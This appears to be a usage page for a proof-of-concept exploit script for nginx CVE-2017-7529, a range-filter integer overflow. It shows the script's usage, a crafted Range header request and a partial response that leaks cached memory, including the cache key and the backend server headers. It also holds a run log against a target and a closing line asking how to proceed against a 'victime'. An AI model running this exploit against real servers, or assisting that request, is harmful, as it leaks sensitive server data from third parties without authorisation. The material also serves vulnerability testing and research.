Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
Make sure requests is installed
usage: python CVE_2017_7529.py [-h] url
Nginx - Remote Integer Overflow Vulnerability - CVE 2017-7529
positional arguments:
url URL to test
optional arguments:
-h, --help show this help message and exit
GET /proxy/demo.png HTTP/1.1
Accept-Encoding: identity
Range: bytes=-17208,-9223372036854758792
Host: 127.0.0.1:8000
Connection: close
User-Agent: Python-urllib/2.7
HTTP/1.1 206 Partial Content
Server: nginx/1.13.1
Date: Mon, 14 Aug 2017 05:53:54 GMT
Content-Type: multipart/byteranges; boundary=00000000000000000002
Connection: close
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
X-Proxy-Cache: HIT
--00000000000000000002
Content-Type: image/png
Content-Range: bytes -623-16584/16585
.......<.Y......................lY....r:.Y.....@.`..v.q.."40c9-5547a060fdf00".................................................................................................................................................................................................................................................................
KEY: httpGET127.0.0.1/proxy/demo.png
HTTP/1.1 200 OK
Date: Mon, 14 Aug 2017 05:51:46 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT
ETag: "40c9-5547a060fdf00"
Accept-Ranges: bytes
Content-Length: 16585
Connection: close
Content-Type: image/png
python CVE_2017_7529.py https://example.com/robots.txt
INFO:main:target: https://example.com/robots.txt
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): example.com
INFO:main:status: 200
INFO:main:server: nginx/1.12.2
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): example.com
INFO:main:status: 200
INFO:main:server: nginx/1.12.2
INFO:main:vulnerable: Unknown (200)
now what to do my victime has only robots.txt dir with 200 okay response